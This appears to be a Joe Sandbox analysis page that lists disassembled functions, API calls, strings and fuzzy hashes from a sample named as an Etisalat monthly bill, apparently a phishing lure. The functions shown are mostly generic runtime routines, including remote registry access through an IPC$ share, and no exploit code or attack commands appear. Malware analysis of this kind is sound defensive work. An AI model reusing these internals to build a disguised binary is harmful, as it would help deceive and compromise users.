Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b65e89f7ee7a29fbcb0ebdb1b6d2bf12b4bd15273b20023b620a38857efff6ad
Instruction ID: 519dc6ec42b64c437b727a259b4994711ebe2d59535264a7aa63333dd978311d
Opcode Fuzzy Hash: b65e89f7ee7a29fbcb0ebdb1b6d2bf12b4bd15273b20023b620a38857efff6ad
Instruction Fuzzy Hash: 9D61F4B6D04219EFCF14CFA4D884EAEBBB5FF48310F20852AE955A7250D774A941DF50

Function 008DDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 008DDAA1

Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD659
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD66B
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD67D
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD68F
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD6A1
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD6B3
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD6C5
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD6D7
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD6E9
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD6FB
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD70D
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD71F
Part of subcall function 008DD63C: _free.LIBCMT ref: 008DD731

_free.LIBCMT ref: 008DDA96

Part of subcall function 008D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000), ref: 008D29DE
Part of subcall function 008D29C8: GetLastError.KERNEL32(00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000,00000000), ref: 008D29F0

_free.LIBCMT ref: 008DDAB8
_free.LIBCMT ref: 008DDACD
_free.LIBCMT ref: 008DDAD8
_free.LIBCMT ref: 008DDAFA
_free.LIBCMT ref: 008DDB0D
_free.LIBCMT ref: 008DDB1B
_free.LIBCMT ref: 008DDB26
_free.LIBCMT ref: 008DDB5E
_free.LIBCMT ref: 008DDB65
_free.LIBCMT ref: 008DDB82
_free.LIBCMT ref: 008DDB9A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 66c28c781467591687fce27939b69fcdbadf8d80c824530f1ef10e576edaf35e
Instruction ID: 956b6eda7ce11b42b2a34af00b290b339d9841360672aa61d4080f0969076b89
Opcode Fuzzy Hash: 66c28c781467591687fce27939b69fcdbadf8d80c824530f1ef10e576edaf35e
Instruction Fuzzy Hash: 38315A32604704AFEB21BA39E845F6A7BE8FF10324F15861BE449D7391DA30AC409B21

Function 0090365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0090369C
_wcslen.LIBCMT ref: 009036A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00903797
GetClassNameW.USER32(?,?,00000400), ref: 0090380C
GetDlgCtrlID.USER32(?), ref: 0090385D
GetWindowRect.USER32(?,?), ref: 00903882
GetParent.USER32(?), ref: 009038A0
ScreenToClient.USER32(00000000), ref: 009038A7
GetClassNameW.USER32(?,?,00000100), ref: 00903921
GetWindowTextW.USER32(?,?,00000400), ref: 0090395D

Strings

%s%u, xrefs: 00903734

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: e1dbfa09b52adfbf8f996ead9af0ac7b28d2259a173f16044eae69452674c072
Instruction ID: 5c85117ecd63a8b5793d342768cda2374e595d325369d51b0dd0daa9d7eb7dff
Opcode Fuzzy Hash: e1dbfa09b52adfbf8f996ead9af0ac7b28d2259a173f16044eae69452674c072
Instruction Fuzzy Hash: 4391AD71204606EFDB19DF24C885FAAB7ADFF44354F00C629F9AAD2191DB30EA45CB91

Function 00904954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00904994
GetWindowTextW.USER32(?,?,00000400), ref: 009049DA
_wcslen.LIBCMT ref: 009049EB
CharUpperBuffW.USER32(?,00000000), ref: 009049F7
_wcsstr.LIBVCRUNTIME ref: 00904A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00904A64
GetWindowTextW.USER32(?,?,00000400), ref: 00904A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00904AE6
GetClassNameW.USER32(?,?,00000400), ref: 00904B20
GetWindowRect.USER32(?,?), ref: 00904B8B

Strings

ThumbnailClass, xrefs: 00904A6F, 00904AF1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 7d5503b9bd89746178b795f82f143d4573d67bcaef600f000537a077faad8805
Instruction ID: d77d67a204917e73bfc325f940236f2c6d0231cffbe7f21c6cba3e1658f372e3
Opcode Fuzzy Hash: 7d5503b9bd89746178b795f82f143d4573d67bcaef600f000537a077faad8805
Instruction Fuzzy Hash: 0E919AB21082069FDB04DF14C985BAA77ECFF84754F048469FE859A0D6EB34ED45CBA2

Function 00938D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008B9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00938D5A
GetFocus.USER32 ref: 00938D6A
GetDlgCtrlID.USER32(00000000), ref: 00938D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00938E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00938ECF
GetMenuItemCount.USER32(?), ref: 00938EEC
GetMenuItemID.USER32(?,00000000), ref: 00938EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00938F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00938F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00938FA1

Strings

0, xrefs: 00938E9F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: ae42b37dd98b9cf39cf543c23d1917b4e12c9102ebfa4926346160493a886d27
Instruction ID: 7f00be1c8deb0d117e5fc8e792c9322ea319957661d0c69aad69724ca9e41003
Opcode Fuzzy Hash: ae42b37dd98b9cf39cf543c23d1917b4e12c9102ebfa4926346160493a886d27
Instruction Fuzzy Hash: 04818EB1508301AFD720DF24D884AABBBE9FB88754F140919F995E7291DB70D901DFA2

Function 0090DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0090DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0090DC46
_wcslen.LIBCMT ref: 0090DC50
_wcsstr.LIBVCRUNTIME ref: 0090DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0090DCBC

Strings

DefaultLangCodepage, xrefs: 0090DD1F
%u.%u.%u.%u, xrefs: 0090DD9A
\VarFileInfo\Translation, xrefs: 0090DCB4
04090000, xrefs: 0090DCF2
StringFileInfo\, xrefs: 0090DC8F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 7a99d048d9db83561eb74faf723c98c11d72327ce2f0ac905e85501a4ca86640
Instruction ID: dfc6e6d7799a4ff6bb0c86ff6ee6dcc166c10f92dc2fa2aba9388c3cfe0325bf
Opcode Fuzzy Hash: 7a99d048d9db83561eb74faf723c98c11d72327ce2f0ac905e85501a4ca86640
Instruction Fuzzy Hash: 0341D0729406107AEB14A7B89C47EBF77BCFF42710F100069F904E61D2EB74DA019BA6

Function 0092CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0092CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0092CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0092CD48

Part of subcall function 0092CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0092CCAA
Part of subcall function 0092CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0092CCBD
Part of subcall function 0092CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0092CCCF
Part of subcall function 0092CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0092CD05
Part of subcall function 0092CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0092CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0092CCF3

Strings

RegDeleteKeyExW, xrefs: 0092CCC9
advapi32.dll, xrefs: 0092CCB8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 3737f45b6dd125fda126188a5e4f7c8c9328b6e176c2c575124c0f90a1ee4e4d
Instruction ID: af037e54b0ec7b8934dd655184e080fee3535f2af60d0832b410ab7fb6ab3f4c
Opcode Fuzzy Hash: 3737f45b6dd125fda126188a5e4f7c8c9328b6e176c2c575124c0f90a1ee4e4d
Instruction Fuzzy Hash: 1B3180B5901128BBDB208BA1EC88EFFBB7CEF46740F000565A905E3244D7749E45EBA0

Function 0090E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0090E6B4

Part of subcall function 008BE551: timeGetTime.WINMM(?,?,0090E6D4), ref: 008BE555

Sleep.KERNEL32(0000000A), ref: 0090E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0090E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0090E727
SetActiveWindow.USER32 ref: 0090E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0090E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0090E773
Sleep.KERNEL32(000000FA), ref: 0090E77E
IsWindow.USER32 ref: 0090E78A
EndDialog.USER32(00000000), ref: 0090E79B

Strings

BUTTON, xrefs: 0090E719

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: c6f39074438f6a18e4774491d0e3024e7ba568fc5712544757b731a6b33944ab
Instruction ID: 7882713e8296bfb4a0345480d066077a20568b27ad25d00f12778cc016592a2d
Opcode Fuzzy Hash: c6f39074438f6a18e4774491d0e3024e7ba568fc5712544757b731a6b33944ab
Instruction Fuzzy Hash: 8A2181B222C605AFEB006F64EC89B293B6DF79474DF144826F50A911E1DB72AC40BF24

Function 0090E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0090EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0090EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0090EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0090EAA7

Strings

open , xrefs: 0090EA0C
alias PlayMe, xrefs: 0090EA36
play PlayMe, xrefs: 0090EAA2
status PlayMe mode, xrefs: 0090EA58
play PlayMe wait, xrefs: 0090EA91
close PlayMe, xrefs: 0090EA6E, 0090EA9B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 6703737ce4f237440d137998538b656fab9141794eb223f2b62a2d6ef3700a8d
Instruction ID: 73a4f74c266028f08e106073169a83058a522b211ca74b0d1644cbc9ae15fcfd
Opcode Fuzzy Hash: 6703737ce4f237440d137998538b656fab9141794eb223f2b62a2d6ef3700a8d
Instruction Fuzzy Hash: 50117331A502197DE720A7A5DC4ADFF6A7CFBD6B44F040829B801E20D1EFB00945C9B1

Function 00905CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00905CE2
GetWindowRect.USER32(00000000,?), ref: 00905CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00905D59
GetDlgItem.USER32(?,00000002), ref: 00905D69
GetWindowRect.USER32(00000000,?), ref: 00905D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00905DCF
GetDlgItem.USER32(?,000003E9), ref: 00905DDD
GetWindowRect.USER32(00000000,?), ref: 00905DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00905E31
GetDlgItem.USER32(?,000003EA), ref: 00905E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00905E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00905E67

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 2dfd4c04d42fd619c960429d997cf7b32a2c7dbf017bd77ced2a4b043af9291b
Instruction ID: dc650c7010dd082dab7295fe7bf543a8516933e44b471418b2027eb25db6b88f
Opcode Fuzzy Hash: 2dfd4c04d42fd619c960429d997cf7b32a2c7dbf017bd77ced2a4b043af9291b
Instruction Fuzzy Hash: 5F51FDB1A10615AFDF18CF68DD89AAEBBB9FB48700F158129F916E62D0D7709E04CF50

Function 008B8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 008B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008B8BE8,?,00000000,?,?,?,?,008B8BBA,00000000,?), ref: 008B8FC5

DestroyWindow.USER32(?), ref: 008B8C81
KillTimer.USER32(00000000,?,?,?,?,008B8BBA,00000000,?), ref: 008B8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 008F6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,008B8BBA,00000000,?), ref: 008F69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,008B8BBA,00000000,?), ref: 008F69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008B8BBA,00000000), ref: 008F69D4
DeleteObject.GDI32(00000000), ref: 008F69E6

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: c432c2c06e08384fcbcf227aeec07097c5980f06bbbe8333f4aa9ccee3b6664c
Instruction ID: 3d41b9f383faa68399531c778640cefd5a9af06649eb62c5a52c163d86075b89
Opcode Fuzzy Hash: c432c2c06e08384fcbcf227aeec07097c5980f06bbbe8333f4aa9ccee3b6664c
Instruction Fuzzy Hash: B561EC72116A09DFCB258F28D958BBA7BF5FB00316F144618E146EB660CB71ACD1EF90

Function 008B9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 008B9944: GetWindowLongW.USER32(?,000000EB), ref: 008B9952

GetSysColor.USER32(0000000F), ref: 008B9862

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 06ff1cf0f13a5fb0e88ca1a9788441e0a5b1a199bf7e4b7f7fb644428f207a69
Instruction ID: bba9b7bed88d576dfc5fd39b204a008a1d83eff4a9da46e47ccd5da6cea84e49
Opcode Fuzzy Hash: 06ff1cf0f13a5fb0e88ca1a9788441e0a5b1a199bf7e4b7f7fb644428f207a69
Instruction Fuzzy Hash: 63417F71108A44AFDB215F789C84BBA3BB5FB06330F144669FAE2D72E1D7319842EB11

Function 009096E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,008EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00909717
LoadStringW.USER32(00000000,?,008EF7F8,00000001), ref: 00909720

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,008EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00909742
LoadStringW.USER32(00000000,?,008EF7F8,00000001), ref: 00909745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00909866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0090984A
Line %d (File "%s"):, xrefs: 0090978F
Line %d:, xrefs: 009097A0
Error: , xrefs: 0090981D
^ ERROR, xrefs: 009097FB

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 8b6f6b60a372953523b49b235bbbf381e3c065c56baf95b67b0c9c7629bb8d0e
Instruction ID: 636924c67e79d62ec86b8f46e334e37ca0dfea2dcb06fbd1da258c99027db8ec
Opcode Fuzzy Hash: 8b6f6b60a372953523b49b235bbbf381e3c065c56baf95b67b0c9c7629bb8d0e
Instruction Fuzzy Hash: 6B413B72804219AADF04EBE4DD46EEE7778EF56340F504025F605B2192EB356F48CB62

Function 009006DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 008A6B57: _wcslen.LIBCMT ref: 008A6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009007A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009007BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009007DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00900804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0090082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00900837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0090083C

Strings

SOFTWARE\Classes\, xrefs: 0090070E
\IPC$, xrefs: 00900784
\CLSID, xrefs: 00900724

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

